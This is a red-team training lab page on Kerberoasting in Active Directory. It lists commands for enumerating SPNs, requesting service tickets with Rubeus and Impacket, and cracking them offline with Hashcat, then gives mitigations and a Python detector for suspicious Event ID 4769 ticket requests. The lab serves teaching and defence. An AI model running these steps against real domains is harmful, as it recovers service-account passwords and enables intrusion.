🎯 Kerberoasting – Red Team Lab #1

Learn how to exploit a classic Active Directory weakness: any authenticated domain user can request service tickets (TGS) for accounts that have an SPN, and because each ticket is encrypted with that service account's password hash, it can be cracked offline to recover the plain-text credential.

This lab is essential for mastering post-compromise escalation via Kerberos SPN abuse.

🧪 Learning Objectives

  • Understand the Kerberoasting attack path
  • Enumerate SPNs in a domain using setspn, PowerView or Impacket
  • Request TGS tickets from a domain controller
  • Extract tickets with Rubeus or GetUserSPNs.py
  • Crack the tickets offline using Hashcat
  • Identify weak service account passwords and mitigate the risk

🏗️ Lab Setup

- 1x Domain Controller (Windows Server 2019 or 2022)

- 1x Domain-joined Windows 10 machine (victim workstation)

- 1x Attacker machine (Kali Linux or Windows with Rubeus installed)

🧩 Domain: `rootdc.local`

🧑‍💼 Domain user: `hacker@rootdc.local`

🛠️ Tools Needed

  • Rubeus (https://github.com/GhostPack/Rubeus) 
  • Hashcat (https://hashcat.net/hashcat/)
  • Impacket (optional for Python lovers)
  • AD Explorer / PowerView (optional for enumeration)

🚨 Attack Walkthrough

  1. Log in as `hacker@rootdc.local` on your attacker VM.
  2. Enumerate SPNs:
     • With PowerView: `Get-NetUser -SPN`
     • With Impacket: `GetUserSPNs.py rootdc.local/hacker -dc-ip <DC-IP>`
  3. Request a TGS ticket:
     • With Rubeus: `Rubeus.exe kerberoast`
  4. Export the ticket hash to a file (for example `ticket.hash`).
  5. Crack the hash:
     • `hashcat -m 13100 ticket.hash /wordlists/rockyou.txt`
  6. Analyze the cracked credentials.
  7. Suggest mitigations:
     • Complex passwords
     • No SPN on sensitive accounts
     • gMSA accounts where possible

📎 Resources

  • 🔗 Download Rubeus (https://github.com/GhostPack/Rubeus)
  • 🔗 Example Hashcat Command: `hashcat -m 13100 ticket.hash /wordlists/rockyou.txt`
  • 🔗 Download PowerView

🛡️ How to Defend Against Kerberoasting

- Use strong, complex passwords for service accounts

- Regularly rotate credentials for accounts with SPNs

- Avoid using standard user accounts for services

- Implement a tiered admin model and log all TGS requests

- Monitor for abnormal Kerberos activity in your SIEM
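The last two items, logging TGS requests and watching for abnormal Kerberos activity, come down to one detection over the domain controller's Security log. The following is an added example, not part of the RootDC.io lab: it flags an account that requests RC4-encrypted (etype 0x17, the ticket type Hashcat mode 13100 cracks) service tickets for several distinct user-account SPNs within a short window, which is the footprint the Rubeus and GetUserSPNs.py steps above leave in Event ID 4769 records. The event records, account names, IPs and thresholds are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; AES tickets show 0x11 or 0x12

def _ev(time, user, svc, etype, ip):  # keys follow the Windows 4769 event schema
    return {"time": time, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "IpAddress": ip}

# Constructed sample events (not real captures): one burst from "hacker", plus
# a machine-account ticket, an AES ticket and a single legitimate RC4 request.
SAMPLE_EVENTS = [
    _ev("2025-01-10T09:00:01", "hacker@ROOTDC.LOCAL", "svc_sql", "0x17", "10.0.0.50"),
    _ev("2025-01-10T09:00:02", "hacker@ROOTDC.LOCAL", "svc_web", "0x17", "10.0.0.50"),
    _ev("2025-01-10T09:00:02", "hacker@ROOTDC.LOCAL", "svc_backup", "0x17", "10.0.0.50"),
    _ev("2025-01-10T09:00:03", "hacker@ROOTDC.LOCAL", "WS01$", "0x17", "10.0.0.50"),
    _ev("2025-01-10T09:30:00", "alice@ROOTDC.LOCAL", "svc_sql", "0x12", "10.0.0.51"),
    _ev("2025-01-10T10:00:00", "bob@ROOTDC.LOCAL", "svc_web", "0x17", "10.0.0.52"),
]

def is_roastable_request(ev):
    """RC4 ticket for a user-account SPN; machine accounts ($) and krbtgt are skipped."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=3):
    """One alert per account that pulled RC4 tickets for >= min_services distinct
    service accounts inside any sliding interval of length `window`."""
    per_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["time"]), ev["ServiceName"], ev["IpAddress"]))
    alerts = []
    for account, reqs in per_account.items():
        reqs.sort()  # chronological, so every later request has t >= t0
        best = set()
        for i, (t0, _, _) in enumerate(reqs):
            seen = {svc for t, svc, _ in reqs[i:] if t - t0 <= window}
            best = max(best, seen, key=len)
        if len(best) >= min_services:
            alerts.append({"account": account, "source_ip": reqs[0][2],
                           "services": sorted(best)})
    return alerts

if __name__ == "__main__":
    for a in find_kerberoast_bursts(SAMPLE_EVENTS):
        print(f"[ALERT] {a['account']} from {a['source_ip']} requested RC4 tickets "
              f"for {len(a['services'])} SPNs: {', '.join(a['services'])}")
```

The RC4 filter is the classic indicator, but tooling can also request AES tickets, so removing the encryption check and alerting on the distinct-SPN count alone catches those at the cost of more noise.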

© 2025 RootDC.io | Built by KuroStrike | GitHub
